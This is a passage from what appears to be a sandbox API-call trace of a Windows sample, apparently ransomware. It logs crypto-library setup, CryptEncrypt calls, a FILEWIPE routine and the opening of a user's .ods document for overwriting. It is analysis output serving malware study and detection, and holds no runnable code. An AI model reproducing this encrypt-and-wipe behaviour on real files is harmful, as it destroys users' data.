(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0033.982] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.982] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da278, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da278*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.982] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.982] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.982] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.982] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.982] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.982] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.983] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.983] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.983] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0033.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.983] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.983] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.983] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.983] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.983] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.983] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.984] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.985] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.985] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x127d4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x127e0) returned 1 [0033.985] CharLowerBuffW (in: lpsz="byte[75745]", cchLength=0xb | out: lpsz="byte[75745]") returned 0xb [0033.988] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.988] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.988] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x127d4, dwBufLen=0x127e0 | out: pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x127e0) returned 1 [0033.991] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0033.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.991] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.991] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.998] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.998] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.998] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.998] CryptDestroyKey (hKey=0x7c2200) returned 1 [0033.998] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0033.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.998] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.998] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.999] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.999] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.999] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0033.999] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0033.999] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0033.999] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.999] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0033.999] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.999] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0034.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0034.003] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0034.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0034.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca45520, ftCreationTime.dwHighDateTime=0x1d5c4c9, ftLastAccessTime.dwLowDateTime=0x39aa5d90, ftLastAccessTime.dwHighDateTime=0x1d5c27b, ftLastWriteTime.dwLowDateTime=0x39aa5d90, ftLastWriteTime.dwHighDateTime=0x1d5c27b, nFileSizeHigh=0x0, nFileSizeLow=0x127d4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="bGB2.ods", cAlternateFileName="")) returned 0x7c2100 [0034.003] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0034.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.004] CharLowerBuffW (in: lpsz="byte[75732]", cchLength=0xb | out: lpsz="byte[75732]") returned 0xb [0034.004] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0034.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.004] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0034.004] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0034.004] FreeLibrary (hLibModule=0x76b40000) returned 1 [0034.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0034.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0034.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0034.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.005] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.005] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0034.005] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.005] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\bGB2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\gtxvbfxnesrqjbx46\\bgb2.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0034.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0034.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0034.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c50e0 [0034.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x9477e8 | out: hHeap=0x770000) returned 1 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0034.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0034.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0034.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0034.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0034.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0034.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0034.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0034.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0034.007] HeapFree (in: 